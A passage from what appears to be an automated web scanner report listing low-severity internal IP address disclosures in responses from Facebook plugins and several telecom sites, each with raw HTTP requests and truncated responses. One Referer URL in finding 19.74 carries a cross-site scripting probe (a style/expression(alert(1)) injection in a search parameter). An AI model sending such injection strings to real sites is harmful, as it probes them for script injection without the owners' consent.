GET /plugins/like.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1bf0ee42c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.facebook.com%2Fyahoosports&layout=standard&node_type=link&sdk=joey&show_faces=true&width=275 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.168.48
X-Cnection: close
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Length: 26918

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.59. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.65.42.57

Request

GET /plugins/like.php?href=facebook.com%2Faptela&layout=button_count&show_faces=false&width=45&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/login-error/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.42.57
X-Cnection: close
Date: Tue, 06 Sep 2011 12:26:43 GMT
Content-Length: 23272

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.60. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.65.31.41

Request

GET /plugins/like.php?href=http://www.facebook.com/xfinity&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Learn/xfinity/wireless-mobile-broadband.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.31.41
X-Cnection: close
Date: Tue, 06 Sep 2011 12:24:54 GMT
Content-Length: 23350

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.61. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.64.144.32

Request

GET /plugins/like.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3f9b4fbb4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.facebook.com%2Fyahoosports&layout=standard&node_type=link&sdk=joey&show_faces=true&width=275 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.144.32
X-Cnection: close
Date: Tue, 06 Sep 2011 12:46:38 GMT
Content-Length: 26917

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.62. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.64.144.37

Request

GET /plugins/like.php?href=http://finance.yahoo.com%2Fq%3Fs%3DXSS.F&layout=button_count&show_faces=false&action=like&font=arial&colorscheme=light&height=21&width=100&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.144.37
X-Cnection: close
Date: Tue, 06 Sep 2011 12:48:16 GMT
Content-Length: 23445

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.63. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.65.5.46

Request

GET /plugins/like.php?href=http://www.facebook.com/xfinity&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Learn/DigitalCable/digitalcable.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.5.46
X-Cnection: close
Date: Tue, 06 Sep 2011 12:25:30 GMT
Content-Length: 23342

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.64. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.65.35.47

Request

GET /plugins/like.php?href=facebook.com%2Faptela&layout=button_count&show_faces=false&width=45&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/login-error/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.35.47
X-Cnection: close
Date: Tue, 06 Sep 2011 12:26:37 GMT
Content-Length: 23272

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.65. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.65.26.52

Request

GET /plugins/like.php?href=facebook.com%2Faptela&layout=button_count&show_faces=false&width=45&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.26.52
X-Cnection: close
Date: Tue, 06 Sep 2011 12:26:26 GMT
Content-Length: 23269

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.66. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.64.168.65

Request

GET /plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3d72c50%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.168.65
X-Cnection: close
Date: Tue, 06 Sep 2011 12:46:07 GMT
Content-Length: 26012

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.67. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3647379a8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.52
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:08 GMT
Content-Length: 26014

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.68. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fyahoorealestate&width=220&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.146.33
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:19 GMT
Content-Length: 8262

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

19.69. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=106890669355244&width=290&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.38
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:17 GMT
Content-Length: 8244

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

19.70. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=210163452329780&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25493d93%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=254&href=http%3A%2F%2Fwww.facebook.com%2Fmyfitv&locale=en_US&sdk=joey&show_faces=true&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.139.32
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:41 GMT
Content-Length: 12771

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

19.71. http://www.fairpoint.com/scripts/script.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /scripts/script.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /scripts/script.js HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:56:23 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Accept-Ranges: bytes
ETag: W/"87706-1314616102000"
Last-Modified: Mon, 29 Aug 2011 11:08:22 GMT
Content-Length: 87706
Content-Type: text/javascript

var imagepath_prefix = "/static";
//var serverURL="http://216.227.79.66";
var serverURL="http://" + location.host;
//var googleServiceTarget="http://209.105.163.13/search?q=$$$&btnG=Search&sort=dat
...[SNIP]...
http://209.105.163.13/search?q=$$$&btnG=Search&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=TG_CMS&proxystylesheet=TG_CMS&site=fairpoint_test";

var googleServiceTarget2="http://172.24.69.18/search?q=$$$&btnG=Search&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=default_frontend&proxystylesheet=telco_frontend&site=@@@";
var indexedLocation = [];
indexedLocation[1] = "
...[SNIP]...

19.72. http://www.frontier.com/Js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Js/s_code.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/s_code.js HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; expires=Thu, 6-Sep-2012 11:50:33 GMT; path=/
Content-Length: 29119
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 05:01:12 GMT
Accept-Ranges: bytes
ETag: "8cabb274e1acc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:37 GMT

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//d
...[SNIP]...

19.73. http://www.frontierhelp.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; expires=Thu, 6-Sep-2012 12:45:15 GMT; path=/
Connection: close
Date: Tue, 06 Sep 2011 12:45:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2324395;expires=Thu, 29-Aug-2041 12:45:20 GMT;path=/
Set-Cookie: CFTOKEN=20838155;expires=Thu, 29-Aug-2041 12:45:20 GMT;path=/
location: /frontiercare
Content-Type: text/html; charset=UTF-8


19.74. http://www.frontierpages.com/scripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /scripts/s_code.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /scripts/s_code.js HTTP/1.1
Host: www.frontierpages.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://yp.frontierpages.com/results.aspx?searchby=&Termsearch=true&Partnerid=BRY-01&Pagesize=0&Pagenumber=1&Portal=Frontier&term=d5b57%22style%3d%22x%3aexpression(alert(1))%22d9518141ec5&city=Dallas&state=TX&zip=

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da947bCMYKY; expires=Thu, 6-Sep-2012 12:56:23 GMT; path=/
Content-Length: 17665
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Mar 2010 15:00:18 GMT
Accept-Ranges: bytes
ETag: "0ed9e84fb9ca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:56:30 GMT

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

//Dev
//var s_account="cznquapages"

//Prod
var s_account="cznpages"
...[SNIP]...

19.75. http://www.vonage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /?login HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
